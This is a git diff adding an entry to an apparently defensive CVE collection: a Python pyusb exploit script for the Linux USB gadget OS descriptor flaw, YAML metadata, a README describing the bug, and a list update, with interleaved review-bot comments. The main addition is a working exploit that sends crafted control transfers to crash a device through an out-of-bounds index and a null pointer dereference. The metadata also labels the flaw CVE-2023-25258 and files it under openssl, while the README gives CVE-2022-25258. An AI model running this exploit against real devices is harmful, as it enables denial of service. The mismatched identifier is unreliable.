diff --git a/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.py b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.py
new file mode 100644
index 0000000000000000000000000000000000000000..475ebc94a3d2667f03556540361e2fb4dca409b7
--- /dev/null
+++ b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.py
@@ -0,0 +1,94 @@
+#!/usr/bin/python3
+
+#
+# Sample exploit to demonstrate Linux USB gadget
+# subsystem's os descriptor handling flaws.
+#
+# This script requires pyusb.
+#
+# https://github.com/szymonh
+#
+
+import argparse
+
+import usb.core
+
+
+REQ_GET_DESCRIPTOR = 0x06
+
+
+def auto_int(val: str) -> int:
+ '''Convert arbitrary string to integer
+ Used as argparse type to automatically handle input with
+ different base - decimal, octal, hex etc.
+ '''
+ return int(val, 0)
+
+
+def parse_args() -> argparse.Namespace:
+ '''Parse command line arguments
+ '''
+ parser = argparse.ArgumentParser(
+ description='Sample exploit for interface OS descriptor vulnerability'
+ )
+
+ parser.add_argument('-v', '--vid', type=auto_int, required=True,
+ help='vendor id')
+ parser.add_argument('-p', '--pid', type=auto_int, required=True,
+ help='product id')
+
+ return parser.parse_args()
+
+
+def print_request(req_type, req, val, idx, length):
+ '''Write control transfer request to stdout
+ '''
+ print('{0:02X} {1:02X} {2:04X} {3:04X} {4:04X} '.format(
+ req_type, req, val, idx, length), end=' ')
+
+
+def exploit(args: argparse.Namespace) -> None:
+ '''Attempt exploit the interface OS descriptor
+ Kernel will crash due to null pointer dereference and access
+ beyond array boundaries. 
+ '''
+ usbdev = usb.core.find(idVendor=args.vid, idProduct=args.pid)
+ if usbdev is None:
+ print('Device not found, verify specified VID and PID')
+ return
+
+ for cfg in usbdev:
+ for idx in range(cfg.bNumInterfaces):
+ if usbdev.is_kernel_driver_active(idx):
+ usbdev.detach_kernel_driver(idx)
+ usbdev.set_configuration()
+
+ data = usbdev.ctrl_transfer(0x80, REQ_GET_DESCRIPTOR, (0x03 << 8) | 0xee, 0x00, 0x12)
+ if not data or len(data) != 0x12:
+ print('OS descriptors are not supported')
+ exit(1)
+
+ vendor_code = data[16]
+ print('Vendor code: {0}'.format(vendor_code))
+
+ bmRequestType = 0xc1 # USB_DIR_IN | USB_TYPE_VENDOR | USB_RECIP_INTERFACE
+ bRequest = vendor_code # set to vendor code
+ wValue = 0x00 # upper byte needs to be zero, lower is the interface index
+ wIndex = 0x05 # needs to be 0x5
+ payload = 4096 # value larger than 0x0A
+
+ # iterate throught the c->interface array and beyond
+ for val in range(0x00, 0xff):
+ wValue = val
+ try:
+ print_request(bmRequestType, bRequest, wValue, wIndex, payload)
+ data = usbdev.ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, payload)
+ print('Read data: {0}'.format(data))
+ except usb.core.USBError as e:
+ print(e)
+
+
+if __name__ == '__main__':
+ '''Main script
+ '''
+ exploit(parse_args())
\ No newline at end of file
diff --git a/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..077affc1e8b33fe197f55398f1aaa7373dd29940
--- /dev/null
+++ b/cve/openssl/2023/CVE_2023_25258/CVE_2023_25258.yaml
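Review bot: `exit(1)` after the `'OS descriptors are not supported'` message relies on the site-module builtin rather than `sys.exit`, which is the conventional form for scripts and is unavailable when the site module is not loaded; change it to `sys.exit(1)` and add `import sys` to the stdlib import group. The `'''Main script'''` string under `if __name__ == '__main__':` is a bare expression statement, not a docstring, and should be dropped or turned into a `#` comment. Indentation was collapsed in this view, so I cannot tell whether `usbdev.set_configuration()` sits inside the per-interface loop; if it does, it is re-applied once per interface and belongs after the loop. The loop comment's `throught` should read `through`.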
@@ -0,0 +1,25 @@
+id: CVE-2023-25258
+source: https://github.com/szymonh/d-os-descriptor
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: MEDIUM
+ description: |
+ 在5.16.10之前的Linux内核中的drivers/usb/gadget/composite.c中发现了一个问题:USB小工具子系统缺少对接口操作系统描述符请求(具有大型数组索引的请求和与NULL函数指针检索关联的请求)的某些验证,因此可能会发生内存损坏。
+ scope-of-influence:
+ Red Hat Enterprise Linux 9
+ reference:
+ - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.10
+ - https://github.com/szymonh/d-os-descriptor
+ - https://github.com/torvalds/linux/commit/75e5b4849b81e19e9efe1654b30d7f3151c33c2c
+ - https://lists.debian.org/debian-lts-announce/2022/03/msg00011.html
+ - https://lists.debian.org/debian-lts-announce/2022/03/msg00012.html
+ - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TCW2KZYJ2H6BKZE3CVLHRIXYDGNYYC5P/
+ - https://security.netapp.com/advisory/ntap-20221028-0007/
+ - https://www.debian.org/security/2022/dsa-5092
+ - https://www.debian.org/security/2022/dsa-5096
+ classification:
+ cvss-metrics: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+ cvss-score: 4.6
+ cve-id: CVE-2023-25258
+ cwe-id: CWE-476
+ tags: USB,Memory corruption
\ No newline at end of file
diff --git a/cve/openssl/2023/CVE_2023_25258/README b/cve/openssl/2023/CVE_2023_25258/README
new file mode 100644
index 0000000000000000000000000000000000000000..bf3208bd56b839f1f95ff302310ca9ab07347832
--- /dev/null
+++ b/cve/openssl/2023/CVE_2023_25258/README
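Review bot: The `id:` and `cve-id:` value CVE-2023-25258 does not match the identifier the bundled README gives under `##CVE` (CVE-2022-25258), and every listed reference (ChangeLog-5.16.10, the March 2022 Debian LTS announcements, DSA-5092/5096) dates to 2022, which suggests the README's identifier is the intended one; confirm against the `source:` link before merging, since the same value is also added to `openkylin_list.yaml` and the directory sits under `cve/openssl/` for what the description calls a Linux kernel issue. The `name:` field carries a descriptive sentence rather than a product name; `name: Linux kernel` with that sentence folded into `description:` would keep the fields consistent with their roles. `scope-of-influence:` holds a bare scalar on the following line, which YAML reads as a single string value; if the schema expects a list it should be `- Red Hat Enterprise Linux 9`.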
@@ -0,0 +1,56 @@
+#d-os-descriptor
+##Summary
+The USB Gadget Subsystem includes security issues in the OS descriptor handling section of composite_setup function (composite.c). Processing of properly crafted control transfer request messages result in device crash due to null pointer dereference or memory corruption.
+##Description
+The OS descriptor handling section of composite_setup for interface recipient is implemented as follows.
+case USB_RECIP_INTERFACE:
+ if (w_index != 0x5 || (w_value >> 8))
+ break;
+ interface = w_value & 0xFF;
+ buf[6] = w_index;
+ count = count_ext_prop(os_desc_cfg,
+ interface);
+ put_unaligned_le16(count, buf + 8);
+ count = len_ext_prop(os_desc_cfg,
+ interface);
+ put_unaligned_le32(count, buf);
+ value = w_length;
+ if (w_length > 0x0A) {
+ value = fill_ext_prop(os_desc_cfg,
+ interface, buf);
+ if (value >= 0)
+ value = min_t(u16, w_length, value);
+}
+break;
+The interface variable is derived from w_value and later utilized to index usb_configuration->interface array in count_ext_prop, len_ext_prop and fill_ext_prop functions. Since c->interface array has the size of MAX_CONFIG_INTERFACES (16) elements and interface variable is not validated in neither composite_setup's OS descriptor handling section nor the called functions this allows an attacker to index the c->interface array past the actual boundaries. In case interface variable has a value greater or equal to MAX_CONFIG_INTERFACES the endpoint should be stalled.
+
+In certain cases, depending on actual memory content indexing past c->interface array may trigger buffer overflow of req->buf via fill_ext_prop when wLength is greater than 0x0A. If sum of ext_prop->name_len, ext_prop->data_len, 14 and 10 overflows int the count + n >= USB_COMP_EP0_OS_DESC_BUFSIZ condition would not be met allowing overflow via memcpy in usb_ext_prop_put_binary. Yet the probability of such situation seems pretty low. 
+
+Furthermore the functions count_ext_prop, len_ext_prop and fill_ext_prop are missing validation if the *usb_function retrieved from c->interface array is actually valid resulting in null pointer dereference. When the retrieved usb_function pointer is null the endpoint should be stalled.
+static int count_ext_prop(struct usb_configuration *c, int interface)
+{
+ struct usb_function *f;
+ int j;
+
+ f = c->interface[interface];
+ for (j = 0; j < f->os_desc_n; ++j) {
+ struct usb_os_desc *d;
+
+ if (interface != f->os_desc_table[j].if_id)
+ continue;
+ d = f->os_desc_table[j].os_desc;
+ if (d && d->ext_compat_id)
+ return d->ext_prop_count;
+ }
+return 0;
+}
+##Impact
+Linux (and Android) devices exposing usb gadgets with OS descriptor support may be arbitrarily crashed by a malicious host by means of a single control transfer message.
+
+##CVE
+CVE-2022-25258
+
+##Patch
+A patch addressing the described issue was accepted and is now available in supported kernel versions. For more information consult the below link.
+
+USB: gadget: validate interface OS descriptor requests
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 9280183190cb5781088a8c0d53c20d5363f5016d..25be14cf7e2859220f3c55904def65bfc55d6651 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -69,6 +69,7 @@ cve:
 - CVE-2022-2274
 - CVE-2022-3602
 - CVE-2023-25136
+ - CVE-2023-25258
 - CVE-2021-3449
 - CVE-2022-0778
 libxml2: